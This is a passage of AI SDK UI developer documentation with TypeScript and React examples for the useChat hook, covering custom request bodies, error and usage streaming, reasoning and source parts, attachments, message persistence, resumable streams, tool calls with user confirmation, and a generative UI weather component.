  headers: {
    Authorization: 'your_token',
  },
  body: {
    user_id: '123',
  },
  credentials: 'same-origin',
});

In this example, the useChat hook sends a POST request to the /api/custom-chat endpoint with the specified headers, additional body fields, and credentials for that fetch request. On your server side, you can handle the request with these additional information.

Setting custom body fields per request

You can configure custom body fields on a per-request basis using the body option of the handleSubmit function. This is useful if you want to pass in additional information to your backend that is not part of the message list.

'use client';

import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages, input, handleInputChange, handleSubmit } = useChat();
  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}: {m.content}
        </div>
      ))}

      <form
        onSubmit={event => {
          handleSubmit(event, {
            body: {
              customKey: 'customValue',
            },
          });
        }}
      >
        <input value={input} onChange={handleInputChange} />
      </form>
    </div>
  );
}

You can retrieve these custom fields on your server side by destructuring the request body:

export async function POST(req: Request) {
  // Extract addition information ("customKey") from the body of the request:
  const { messages, customKey } = await req.json();
  //...
}

Controlling the response stream

With streamText, you can control how error messages and usage information are sent back to the client.

Error Messages

By default, the error message is masked for security reasons. The default error message is "An error occurred." You can forward error messages or send your own error message by providing a getErrorMessage function:

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: openai('gpt-4o'),
    messages,
  });

  return result.toDataStreamResponse({
    getErrorMessage: error => {
      if (error == null) {
        return 'unknown error';
      }

      if (typeof error === 'string') {
        return error;
      }

      if (error instanceof Error) {
        return error.message;
      }

      return JSON.stringify(error);
    },
  });
}

Usage Information

By default, the usage information is sent back to the client. You can disable it by setting the sendUsage option to false:

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: openai('gpt-4o'),
    messages,
  });

  return result.toDataStreamResponse({
    sendUsage: false,
  });
}

Text Streams

useChat can handle plain text streams by setting the streamProtocol option to text:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages } = useChat({
    streamProtocol: 'text',
  });

  return <>...</>;
}

This configuration also works with other backend servers that stream plain text. Check out the stream protocol guide for more information.

Empty Submissions

You can configure the useChat hook to allow empty submissions by setting the allowEmptySubmit option to true.

'use client';

import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages, input, handleInputChange, handleSubmit } = useChat();
  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}: {m.content}
        </div>
      ))}

      <form
        onSubmit={event => {
          handleSubmit(event, {
            allowEmptySubmit: true,
          });
        }}
      >
        <input value={input} onChange={handleInputChange} />
      </form>
    </div>
  );
}

Reasoning

Some models such as as DeepSeek deepseek-reasoner and Anthropic claude-3-7-sonnet-20250219 support reasoning tokens. These tokens are typically sent before the message content. You can forward them to the client with the sendReasoning option:

import { deepseek } from '@ai-sdk/deepseek';
import { streamText } from 'ai';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: deepseek('deepseek-reasoner'),
    messages,
  });

  return result.toDataStreamResponse({
    sendReasoning: true,
  });
}

On the client side, you can access the reasoning parts of the message object.

They have a details property that contains the reasoning and redacted reasoning parts. You can also use reasoning to access just the reasoning as a string.

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}
    {message.parts.map((part, index) => {
      // text parts:
      if (part.type === 'text') {
        return <div key={index}>{part.text}</div>;
      }

      // reasoning parts:
      if (part.type === 'reasoning') {
        return (
          <pre key={index}>
            {part.details.map(detail =>
              detail.type === 'text' ? detail.text : '<redacted>',
            )}
          </pre>
        );
      }
    })}
  </div>
));

Sources

Some providers such as Perplexity and Google Generative AI include sources in the response.

Currently sources are limited to web pages that ground the response. You can forward them to the client with the sendSources option:

import { perplexity } from '@ai-sdk/perplexity';
import { streamText } from 'ai';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: perplexity('sonar-pro'),
    messages,
  });

  return result.toDataStreamResponse({
    sendSources: true,
  });
}

On the client side, you can access source parts of the message object. Here is an example that renders the sources as links at the bottom of the message:

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}
    {message.parts
      .filter(part => part.type !== 'source')
      .map((part, index) => {
        if (part.type === 'text') {
          return <div key={index}>{part.text}</div>;
        }
      })}
    {message.parts
      .filter(part => part.type === 'source')
      .map(part => (
        <span key={`source-${part.source.id}`}>
          [
          <a href={part.source.url} target="_blank">
            {part.source.title ?? new URL(part.source.url).hostname}
          </a>
          ]
        </span>
      ))}
  </div>
));

Image Generation

Some models such as Google gemini-2.0-flash-exp support image generation. When images are generated, they are exposed as files to the client. On the client side, you can access file parts of the message object and render them as images.

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}
    {message.parts.map((part, index) => {
      if (part.type === 'text') {
        return <div key={index}>{part.text}</div>;
      } else if (part.type === 'file' && part.mimeType.startsWith('image/')) {
        return (
          <img key={index} src={`data:${part.mimeType};base64,${part.data}`} />
        );
      }
    })}
  </div>
));

Attachments (Experimental)

The useChat hook supports sending attachments along with a message as well as rendering them on the client. This can be useful for building applications that involve sending images, files, or other media content to the AI provider.

There are two ways to send attachments with a message, either by providing a FileList object or a list of URLs to the handleSubmit function:

FileList

By using FileList, you can send multiple files as attachments along with a message using the file input element. The useChat hook will automatically convert them into data URLs and send them to the AI provider.

'use client';

import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';

export default function Page() {
  const { messages, input, handleSubmit, handleInputChange, status } =
    useChat();

  const [files, setFiles] = useState<FileList | undefined>(undefined);
  const fileInputRef = useRef<HTMLInputElement>(null);

  return (
    <div>
      <div>
        {messages.map(message => (
          <div key={message.id}>
            <div>{`${message.role}: `}</div>

            <div>
              {message.content}

              <div>
                {message.experimental_attachments
                  ?.filter(attachment =>
                    attachment.contentType.startsWith('image/'),
                  )
                  .map((attachment, index) => (
                    <img
                      key={`${message.id}-${index}`}
                      src={attachment.url}
                      alt={attachment.name}
                    />
                  ))}
              </div>
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={event => {
          handleSubmit(event, {
            experimental_attachments: files,
          });

          setFiles(undefined);

          if (fileInputRef.current) {
            fileInputRef.current.value = '';
          }
        }}
      >
        <input
          type="file"
          onChange={event => {
            if (event.target.files) {
              setFiles(event.target.files);
            }
          }}
          multiple
          ref={fileInputRef}
        />
        <input
          value={input}
          placeholder="Send message..."
          onChange={handleInputChange}
          disabled={status !== 'ready'}
        />
      </form>
    </div>
  );
}

URLs

You can also send URLs as attachments along with a message. This can be useful for sending links to external resources or media content.

Note: The URL can also be a data URL, which is a base64-encoded string that represents the content of a file. Currently, only image/* content types get automatically converted into multi-modal content parts. You will need to handle other content types manually.

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Attachment } from '@ai-sdk/ui-utils';

export default function Page() {
  const { messages, input, handleSubmit, handleInputChange, status } =
    useChat();

  const [attachments] = useState<Attachment[]>([
    {
      name: 'earth.png',
      contentType: 'image/png',
      url: 'https://example.com/earth.png',
    },
    {
      name: 'moon.png',
      contentType: 'image/png',
      url: 'data:image/png;base64,iVBORw0KGgo...',
    },
  ]);

  return (
    <div>
      <div>
        {messages.map(message => (
          <div key={message.id}>
            <div>{`${message.role}: `}</div>

            <div>
              {message.content}

              <div>
                {message.experimental_attachments
                  ?.filter(attachment =>
                    attachment.contentType?.startsWith('image/'),
                  )
                  .map((attachment, index) => (
                    <img
                      key={`${message.id}-${index}`}
                      src={attachment.url}
                      alt={attachment.name}
                    />
                  ))}
              </div>
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={event => {
          handleSubmit(event, {
            experimental_attachments: attachments,
          });
        }}
      >
        <input
          value={input}
          placeholder="Send message..."
          onChange={handleInputChange}
          disabled={status !== 'ready'}
        />
      </form>
    </div>
  );
}

title: Chatbot Message Persistence description: Learn how to store and load chat messages in a chatbot.

Chatbot Message Persistence

Being able to store and load chat messages is crucial for most AI chatbots. In this guide, we'll show how to implement message persistence with useChat and streamText.

Starting a new chat

When the user navigates to the chat page without providing a chat ID, we need to create a new chat and redirect to the chat page with the new chat ID.

import { redirect } from 'next/navigation';
import { createChat } from '@tools/chat-store';

export default async function Page() {
  const id = await createChat(); // create a new chat
  redirect(`/chat/${id}`); // redirect to chat page, see below
}

Our example chat store implementation uses files to store the chat messages. In a real-world application, you would use a database or a cloud storage service, and get the chat ID from the database. That being said, the function interfaces are designed to be easily replaced with other implementations.

import { generateId } from 'ai';
import { existsSync, mkdirSync } from 'fs';
import { writeFile } from 'fs/promises';
import path from 'path';

export async function createChat(): Promise<string> {
  const id = generateId(); // generate a unique chat ID
  await writeFile(getChatFile(id), '[]'); // create an empty chat file
  return id;
}

function getChatFile(id: string): string {
  const chatDir = path.join(process.cwd(), '.chats');
  if (!existsSync(chatDir)) mkdirSync(chatDir, { recursive: true });
  return path.join(chatDir, `${id}.json`);
}

Loading an existing chat

When the user navigates to the chat page with a chat ID, we need to load the chat messages and display them.

import { loadChat } from '@tools/chat-store';
import Chat from '@ui/chat';

export default async function Page(props: { params: Promise<{ id: string }> }) {
  const { id } = await props.params; // get the chat ID from the URL
  const messages = await loadChat(id); // load the chat messages
  return <Chat id={id} initialMessages={messages} />; // display the chat
}

The loadChat function in our file-based chat store is implemented as follows:

import { Message } from 'ai';
import { readFile } from 'fs/promises';

export async function loadChat(id: string): Promise<Message[]> {
  return JSON.parse(await readFile(getChatFile(id), 'utf8'));
}

// ... rest of the file

The display component is a simple chat component that uses the useChat hook to send and receive messages:

'use client';

import { Message, useChat } from '@ai-sdk/react';

export default function Chat({
  id,
  initialMessages,
}: { id?: string | undefined; initialMessages?: Message[] } = {}) {
  const { input, handleInputChange, handleSubmit, messages } = useChat({
    id, // use the provided chat ID
    initialMessages, // initial messages if provided
    sendExtraMessageFields: true, // send id and createdAt for each message
  });

  // simplified rendering code, extend as needed:
  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.content}
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input value={input} onChange={handleInputChange} />
      </form>
    </div>
  );
}

Storing messages

useChat sends the chat id and the messages to the backend. We have enabled the sendExtraMessageFields option to send the id and createdAt fields, meaning that we store messages in the useChat message format.

Storing messages is done in the onFinish callback of the streamText function. onFinish receives the messages from the AI response as a CoreMessage[], and we use the appendResponseMessages helper to append the AI response messages to the chat messages.

import { openai } from '@ai-sdk/openai';
import { appendResponseMessages, streamText } from 'ai';
import { saveChat } from '@tools/chat-store';

export async function POST(req: Request) {
  const { messages, id } = await req.json();

  const result = streamText({
    model: openai('gpt-4o-mini'),
    messages,
    async onFinish({ response }) {
      await saveChat({
        id,
        messages: appendResponseMessages({
          messages,
          responseMessages: response.messages,
        }),
      });
    },
  });

  return result.toDataStreamResponse();
}

The actual storage of the messages is done in the saveChat function, which in our file-based chat store is implemented as follows:

import { Message } from 'ai';
import { writeFile } from 'fs/promises';

export async function saveChat({
  id,
  messages,
}: {
  id: string;
  messages: Message[];
}): Promise<void> {
  const content = JSON.stringify(messages, null, 2);
  await writeFile(getChatFile(id), content);
}

// ... rest of the file

Message IDs

In addition to a chat ID, each message has an ID. You can use this message ID to e.g. manipulate individual messages.

The IDs for user messages are generated by the useChat hook on the client, and the IDs for AI response messages are generated by streamText.

You can control the ID format by providing ID generators (see createIdGenerator():

import { createIdGenerator } from 'ai';
import { useChat } from '@ai-sdk/react';

const {
  // ...
} = useChat({
  // ...
  // id format for client-side messages:
  generateId: createIdGenerator({
    prefix: 'msgc',
    size: 16,
  }),
});

import { createIdGenerator, streamText } from 'ai';

export async function POST(req: Request) {
  // ...
  const result = streamText({
    // ...
    // id format for server-side messages:
    experimental_generateMessageId: createIdGenerator({
      prefix: 'msgs',
      size: 16,
    }),
  });
  // ...
}

Sending only the last message

Once you have implemented message persistence, you might want to send only the last message to the server. This reduces the amount of data sent to the server on each request and can improve performance.

To achieve this, you can provide an experimental_prepareRequestBody function to the useChat hook (React only). This function receives the messages and the chat ID, and returns the request body to be sent to the server.

import { useChat } from '@ai-sdk/react';

const {
  // ...
} = useChat({
  // ...
  // only send the last message to the server:
  experimental_prepareRequestBody({ messages, id }) {
    return { message: messages[messages.length - 1], id };
  },
});

On the server, you can then load the previous messages and append the new message to the previous messages:

import { appendClientMessage } from 'ai';

export async function POST(req: Request) {
  // get the last message from the client:
  const { message, id } = await req.json();

  // load the previous messages from the server:
  const previousMessages = await loadChat(id);

  // append the new message to the previous messages:
  const messages = appendClientMessage({
    messages: previousMessages,
    message,
  });

  const result = streamText({
    // ...
    messages,
  });

  // ...
}

Handling client disconnects

By default, the AI SDK streamText function uses backpressure to the language model provider to prevent the consumption of tokens that are not yet requested.

However, this means that when the client disconnects, e.g. by closing the browser tab or because of a network issue, the stream from the LLM will be aborted and the conversation may end up in a broken state.

Assuming that you have a storage solution in place, you can use the consumeStream method to consume the stream on the backend, and then save the result as usual. consumeStream effectively removes the backpressure, meaning that the result is stored even when the client has already disconnected.

import { appendResponseMessages, streamText } from 'ai';
import { saveChat } from '@tools/chat-store';

export async function POST(req: Request) {
  const { messages, id } = await req.json();

  const result = streamText({
    model,
    messages,
    async onFinish({ response }) {
      await saveChat({
        id,
        messages: appendResponseMessages({
          messages,
          responseMessages: response.messages,
        }),
      });
    },
  });

  // consume the stream to ensure it runs to completion & triggers onFinish
  // even when the client response is aborted:
  result.consumeStream(); // no await

  return result.toDataStreamResponse();
}

When the client reloads the page after a disconnect, the chat will be restored from the storage solution.

Resuming ongoing streams

This feature is experimental and may change in future versions.

The useChat hook has experimental support for resuming an ongoing chat generation stream by any client, either after a network disconnect or by reloading the chat page. This can be useful for building applications that involve long-running conversations or for ensuring that messages are not lost in case of network failures.

The following are the pre-requisities for your chat application to support resumable streams:

Installing the resumable-stream package that helps create and manage the publisher/subscriber mechanism of the streams.
Creating a Redis instance to store the stream state.
Creating a table that tracks the stream IDs associated with a chat.

To resume a chat stream, you will use the experimental_resume function returned by the useChat hook. You will call this function during the initial mount of the hook inside the main chat component.

'use client';

import { useChat } from '@ai-sdk/react';
import { Input } from '@/components/input';
import { Messages } from '@/components/messages';

export function Chat() {
  const { experimental_resume } = useChat({ id });

  useEffect(() => {
    experimental_resume();

    // we use an empty dependency array to
    // ensure this effect runs only once
  }, []);

  return (
    <div>
      <Messages />
      <Input />
    </div>
  );
}

For a more resilient implementation that handles race conditions that can occur in-flight during a resume request, you can use the following useAutoResume hook. This will automatically process the append-message SSE data part streamed by the server.

'use client';

import { useEffect } from 'react';
import type { UIMessage } from 'ai';
import type { UseChatHelpers } from '@ai-sdk/react';

export type DataPart = { type: 'append-message'; message: string };

export interface Props {
  autoResume: boolean;
  initialMessages: UIMessage[];
  experimental_resume: UseChatHelpers['experimental_resume'];
  data: UseChatHelpers['data'];
  setMessages: UseChatHelpers['setMessages'];
}

export function useAutoResume({
  autoResume,
  initialMessages,
  experimental_resume,
  data,
  setMessages,
}: Props) {
  useEffect(() => {
    if (!autoResume) return;

    const mostRecentMessage = initialMessages.at(-1);

    if (mostRecentMessage?.role === 'user') {
      experimental_resume();
    }

    // we intentionally run this once
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, []);

  useEffect(() => {
    if (!data || data.length === 0) return;

    const dataPart = data[0] as DataPart;

    if (dataPart.type === 'append-message') {
      const message = JSON.parse(dataPart.message) as UIMessage;
      setMessages([...initialMessages, message]);
    }
  }, [data, initialMessages, setMessages]);
}

You can then use this hook in your chat component as follows.

'use client';

import { useChat } from '@ai-sdk/react';
import { Input } from '@/components/input';
import { Messages } from '@/components/messages';
import { useAutoResume } from '@/hooks/use-auto-resume';

export function Chat() {
  const { experimental_resume, data, setMessages } = useChat({ id });

  useAutoResume({
    autoResume: true,
    initialMessages: [],
    experimental_resume,
    data,
    setMessages,
  });

  return (
    <div>
      <Messages />
      <Input />
    </div>
  );
}

The experimental_resume function makes a GET request to your configured chat endpoint (or /api/chat by default) whenever your client calls it. If there’s an active stream, it will pick up where it left off, otherwise it simply finishes without error.

The GET request automatically appends the chatId query parameter to the URL to help identify the chat the request belongs to. Using the chatId, you can look up the most recent stream ID from the database and resume the stream.

GET /api/chat?chatId=<your-chat-id>

Earlier, you must've implemented the POST handler for the /api/chat route to create new chat generations. When using experimental_resume, you must also implement the GET handler for /api/chat route to resume streams.

1. Implement the GET handler

Add a GET method to /api/chat that:

Reads chatId from the query string
Validates it’s present
Loads any stored stream IDs for that chat
Returns the latest one to streamContext.resumableStream()
Falls back to an empty stream if it’s already closed

import { loadStreams } from '@/util/chat-store';
import { createDataStream, getMessagesByChatId } from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';

const streamContext = createResumableStreamContext({
  waitUntil: after,
});

export async function GET(request: Request) {
  const { searchParams } = new URL(request.url);
  const chatId = searchParams.get('chatId');

  if (!chatId) {
    return new Response('id is required', { status: 400 });
  }

  const streamIds = await loadStreams(chatId);

  if (!streamIds.length) {
    return new Response('No streams found', { status: 404 });
  }

  const recentStreamId = streamIds.at(-1);

  if (!recentStreamId) {
    return new Response('No recent stream found', { status: 404 });
  }

  const emptyDataStream = createDataStream({
    execute: () => {},
  });

  const stream = await streamContext.resumableStream(
    recentStreamId,
    () => emptyDataStream,
  );

  if (stream) {
    return new Response(stream, { status: 200 });
  }

  /*
   * For when the generation is "active" during SSR but the
   * resumable stream has concluded after reaching this point.
   */

  const messages = await getMessagesByChatId({ id: chatId });
  const mostRecentMessage = messages.at(-1);

  if (!mostRecentMessage || mostRecentMessage.role !== 'assistant') {
    return new Response(emptyDataStream, { status: 200 });
  }

  const messageCreatedAt = new Date(mostRecentMessage.createdAt);

  const streamWithMessage = createDataStream({
    execute: buffer => {
      buffer.writeData({
        type: 'append-message',
        message: JSON.stringify(mostRecentMessage),
      });
    },
  });

  return new Response(streamWithMessage, { status: 200 });
}

After you've implemented the GET handler, you can update the POST handler to handle the creation of resumable streams.

2. Update the POST handler

When you create a brand-new chat completion, you must:

Generate a fresh streamId
Persist it alongside your chatId
Kick off a createDataStream that pipes tokens as they arrive
Hand that new stream to streamContext.resumableStream()

import {
  appendResponseMessages,
  createDataStream,
  generateId,
  streamText,
} from 'ai';
import { appendStreamId, saveChat } from '@/util/chat-store';
import { createResumableStreamContext } from 'resumable-stream';

const streamContext = createResumableStreamContext({
  waitUntil: after,
});

async function POST(request: Request) {
  const { id, messages } = await req.json();
  const streamId = generateId();

  // Record this new stream so we can resume later
  await appendStreamId({ chatId: id, streamId });

  // Build the data stream that will emit tokens
  const stream = createDataStream({
    execute: dataStream => {
      const result = streamText({
        model: openai('gpt-4o'),
        messages,
        onFinish: async ({ response }) => {
          await saveChat({
            id,
            messages: appendResponseMessages({
              messages,
              responseMessages: response.messages,
            }),
          });
        },
      });

      // Return a resumable stream to the client
      result.mergeIntoDataStream(dataStream);
    },
  });

  return new Response(
    await streamContext.resumableStream(streamId, () => stream),
  );
}

With both handlers, your clients can now gracefully resume ongoing streams.

title: Chatbot Tool Usage description: Learn how to use tools with the useChat hook.

Chatbot Tool Usage

With useChat and streamText, you can use tools in your chatbot application. The AI SDK supports three types of tools in this context:

Automatically executed server-side tools
Automatically executed client-side tools
Tools that require user interaction, such as confirmation dialogs

The flow is as follows:

The user enters a message in the chat UI.
The message is sent to the API route.
In your server side route, the language model generates tool calls during the streamText call.
All tool calls are forwarded to the client.
Server-side tools are executed using their execute method and their results are forwarded to the client.
Client-side tools that should be automatically executed are handled with the onToolCall callback. You can return the tool result from the callback.
Client-side tool that require user interactions can be displayed in the UI. The tool calls and results are available as tool invocation parts in the parts property of the last assistant message.
When the user interaction is done, addToolResult can be used to add the tool result to the chat.
When there are tool calls in the last assistant message and all tool results are available, the client sends the updated messages back to the server. This triggers another iteration of this flow.

The tool call and tool executions are integrated into the assistant message as tool invocation parts. A tool invocation is at first a tool call, and then it becomes a tool result when the tool is executed. The tool result contains all information about the tool call as well as the result of the tool execution.

Example

In this example, we'll use three tools:

getWeatherInformation: An automatically executed server-side tool that returns the weather in a given city.
askForConfirmation: A user-interaction client-side tool that asks the user for confirmation.
getLocation: An automatically executed client-side tool that returns a random city.

API route

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { z } from 'zod';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: openai('gpt-4o'),
    messages,
    tools: {
      // server-side tool with execute function:
      getWeatherInformation: {
        description: 'show the weather in a given city to the user',
        parameters: z.object({ city: z.string() }),
        execute: async ({}: { city: string }) => {
          const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
          return weatherOptions[
            Math.floor(Math.random() * weatherOptions.length)
          ];
        },
      },
      // client-side tool that starts user interaction:
      askForConfirmation: {
        description: 'Ask the user for confirmation.',
        parameters: z.object({
          message: z.string().describe('The message to ask for confirmation.'),
        }),
      },
      // client-side tool that is automatically executed on the client:
      getLocation: {
        description:
          'Get the user location. Always ask for confirmation before using this tool.',
        parameters: z.object({}),
      },
    },
  });

  return result.toDataStreamResponse();
}

Client-side page

The client-side page uses the useChat hook to create a chatbot application with real-time message streaming. Tool invocations are displayed in the chat UI as tool invocation parts. Please make sure to render the messages using the parts property of the message.

There are three things worth mentioning:

The onToolCall callback is used to handle client-side tools that should be automatically executed. In this example, the getLocation tool is a client-side tool that returns a random city.
The toolInvocations property of the last assistant message contains all tool calls and results. The client-side tool askForConfirmation is displayed in the UI. It asks the user for confirmation and displays the result once the user confirms or denies the execution. The result is added to the chat using addToolResult.
The maxSteps option is set to 5. This enables several tool use iterations between the client and the server.

'use client';

import { ToolInvocation } from 'ai';
import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages, input, handleInputChange, handleSubmit, addToolResult } =
    useChat({
      maxSteps: 5,

      // run client-side tools that are automatically executed:
      async onToolCall({ toolCall }) {
        if (toolCall.toolName === 'getLocation') {
          const cities = [
            'New York',
            'Los Angeles',
            'Chicago',
            'San Francisco',
          ];
          return cities[Math.floor(Math.random() * cities.length)];
        }
      },
    });

  return (
    <>
      {messages?.map(message => (
        <div key={message.id}>
          <strong>{`${message.role}: `}</strong>
          {message.parts.map(part => {
            switch (part.type) {
              // render text parts as simple text:
              case 'text':
                return part.text;

              // for tool invocations, distinguish between the tools and the state:
              case 'tool-invocation': {
                const callId = part.toolInvocation.toolCallId;

                switch (part.toolInvocation.toolName) {
                  case 'askForConfirmation': {
                    switch (part.toolInvocation.state) {
                      case 'call':
                        return (
                          <div key={callId}>
                            {part.toolInvocation.args.message}
                            <div>
                              <button
                                onClick={() =>
                                  addToolResult({
                                    toolCallId: callId,
                                    result: 'Yes, confirmed.',
                                  })
                                }
                              >
                                Yes
                              </button>
                              <button
                                onClick={() =>
                                  addToolResult({
                                    toolCallId: callId,
                                    result: 'No, denied',
                                  })
                                }
                              >
                                No
                              </button>
                            </div>
                          </div>
                        );
                      case 'result':
                        return (
                          <div key={callId}>
                            Location access allowed:{' '}
                            {part.toolInvocation.result}
                          </div>
                        );
                    }
                    break;
                  }

                  case 'getLocation': {
                    switch (part.toolInvocation.state) {
                      case 'call':
                        return <div key={callId}>Getting location...</div>;
                      case 'result':
                        return (
                          <div key={callId}>
                            Location: {part.toolInvocation.result}
                          </div>
                        );
                    }
                    break;
                  }

                  case 'getWeatherInformation': {
                    switch (part.toolInvocation.state) {
                      // example of pre-rendering streaming tool calls:
                      case 'partial-call':
                        return (
                          <pre key={callId}>
                            {JSON.stringify(part.toolInvocation, null, 2)}
                          </pre>
                        );
                      case 'call':
                        return (
                          <div key={callId}>
                            Getting weather information for{' '}
                            {part.toolInvocation.args.city}...
                          </div>
                        );
                      case 'result':
                        return (
                          <div key={callId}>
                            Weather in {part.toolInvocation.args.city}:{' '}
                            {part.toolInvocation.result}
                          </div>
                        );
                    }
                    break;
                  }
                }
              }
            }
          })}
          <br />
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input value={input} onChange={handleInputChange} />
      </form>
    </>
  );
}

Tool call streaming

You can stream tool calls while they are being generated by enabling the toolCallStreaming option in streamText.

export async function POST(req: Request) {
  // ...

  const result = streamText({
    toolCallStreaming: true,
    // ...
  });

  return result.toDataStreamResponse();
}

When the flag is enabled, partial tool calls will be streamed as part of the data stream. They are available through the useChat hook. The tool invocation parts of assistant messages will also contain partial tool calls. You can use the state property of the tool invocation to render the correct UI.

export default function Chat() {
  // ...
  return (
    <>
      {messages?.map(message => (
        <div key={message.id}>
          {message.parts.map(part => {
            if (part.type === 'tool-invocation') {
              switch (part.toolInvocation.state) {
                case 'partial-call':
                  return <>render partial tool call</>;
                case 'call':
                  return <>render full tool call</>;
                case 'result':
                  return <>render tool result</>;
              }
            }
          })}
        </div>
      ))}
    </>
  );
}

Step start parts

When you are using multi-step tool calls, the AI SDK will add step start parts to the assistant messages. If you want to display boundaries between tool invocations, you can use the step-start parts as follows:

// ...
// where you render the message parts:
message.parts.map((part, index) => {
  switch (part.type) {
    case 'step-start':
      // show step boundaries as horizontal lines:
      return index > 0 ? (
        <div key={index} className="text-gray-500">
          <hr className="my-2 border-gray-300" />
        </div>
      ) : null;
    case 'text':
    // ...
    case 'tool-invocation':
    // ...
  }
});
// ...

Server-side Multi-Step Calls

You can also use multi-step calls on the server-side with streamText. This works when all invoked tools have an execute function on the server side.

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { z } from 'zod';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: openai('gpt-4o'),
    messages,
    tools: {
      getWeatherInformation: {
        description: 'show the weather in a given city to the user',
        parameters: z.object({ city: z.string() }),
        // tool has execute function:
        execute: async ({}: { city: string }) => {
          const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
          return weatherOptions[
            Math.floor(Math.random() * weatherOptions.length)
          ];
        },
      },
    },
    maxSteps: 5,
  });

  return result.toDataStreamResponse();
}

Errors

Language models can make errors when calling tools. By default, these errors are masked for security reasons, and show up as "An error occurred" in the UI.

To surface the errors, you can use the getErrorMessage function when calling toDataStreamResponse.

export function errorHandler(error: unknown) {
  if (error == null) {
    return 'unknown error';
  }

  if (typeof error === 'string') {
    return error;
  }

  if (error instanceof Error) {
    return error.message;
  }

  return JSON.stringify(error);
}

const result = streamText({
  // ...
});

return result.toDataStreamResponse({
  getErrorMessage: errorHandler,
});

In case you are using createDataStreamResponse, you can use the onError function when calling toDataStreamResponse:

const response = createDataStreamResponse({
  // ...
  async execute(dataStream) {
    // ...
  },
  onError: error => `Custom error: ${error.message}`,
});

title: Generative User Interfaces description: Learn how to build Generative UI with AI SDK UI.

Generative User Interfaces

Generative user interfaces (generative UI) is the process of allowing a large language model (LLM) to go beyond text and "generate UI". This creates a more engaging and AI-native experience for users.

At the core of generative UI are tools , which are functions you provide to the model to perform specialized tasks like getting the weather in a location. The model can decide when and how to use these tools based on the context of the conversation.

Generative UI is the process of connecting the results of a tool call to a React component. Here's how it works:

You provide the model with a prompt or conversation history, along with a set of tools.
Based on the context, the model may decide to call a tool.
If a tool is called, it will execute and return data.
This data can then be passed to a React component for rendering.

By passing the tool results to React components, you can create a generative UI experience that's more engaging and adaptive to your needs.

Build a Generative UI Chat Interface

Let's create a chat interface that handles text-based conversations and incorporates dynamic UI elements based on model responses.

Basic Chat Implementation

Start with a basic chat implementation using the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit } = useChat();

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
          <div>{message.content}</div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={handleInputChange}
          placeholder="Type a message..."
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

To handle the chat requests and model responses, set up an API route:

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

export async function POST(request: Request) {
  const { messages } = await request.json();

  const result = streamText({
    model: openai('gpt-4o'),
    system: 'You are a friendly assistant!',
    messages,
    maxSteps: 5,
  });

  return result.toDataStreamResponse();
}

This API route uses the streamText function to process chat messages and stream the model's responses back to the client.

Create a Tool

Before enhancing your chat interface with dynamic UI elements, you need to create a tool and corresponding React component. A tool will allow the model to perform a specific action, such as fetching weather information.

Create a new file called ai/tools.ts with the following content:

import { tool as createTool } from 'ai';
import { z } from 'zod';

export const weatherTool = createTool({
  description: 'Display the weather for a location',
  parameters: z.object({
    location: z.string().describe('The location to get the weather for'),
  }),
  execute: async function ({ location }) {
    await new Promise(resolve => setTimeout(resolve, 2000));
    return { weather: 'Sunny', temperature: 75, location };
  },
});

export const tools = {
  displayWeather: weatherTool,
};

In this file, you've created a tool called weatherTool. This tool simulates fetching weather information for a given location. This tool will return simulated data after a 2-second delay. In a real-world application, you would replace this simulation with an actual API call to a weather service.

Update the API Route

Update the API route to include the tool you've defined:

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { tools } from '@/ai/tools';

export async function POST(request: Request) {
  const { messages } = await request.json();

  const result = streamText({
    model: openai('gpt-4o'),
    system: 'You are a friendly assistant!',
    messages,
    maxSteps: 5,
    tools,
  });

  return result.toDataStreamResponse();
}

Now that you've defined the tool and added it to your streamText call, let's build a React component to display the weather information it returns.

Create UI Components

Create a new file called components/weather.tsx:

type WeatherProps = {
  temperature: number;
  weather: string;
  location: string;
};

export const Weather = ({ temperature, weather, location }: WeatherProps) => {
  return (
    <div>
      <h2>Current Weather for {location}</h2>
      <p>Condition: {weather}</p>
      <p>Temperature: {temperature}°C</p>
    </div>
  );
};

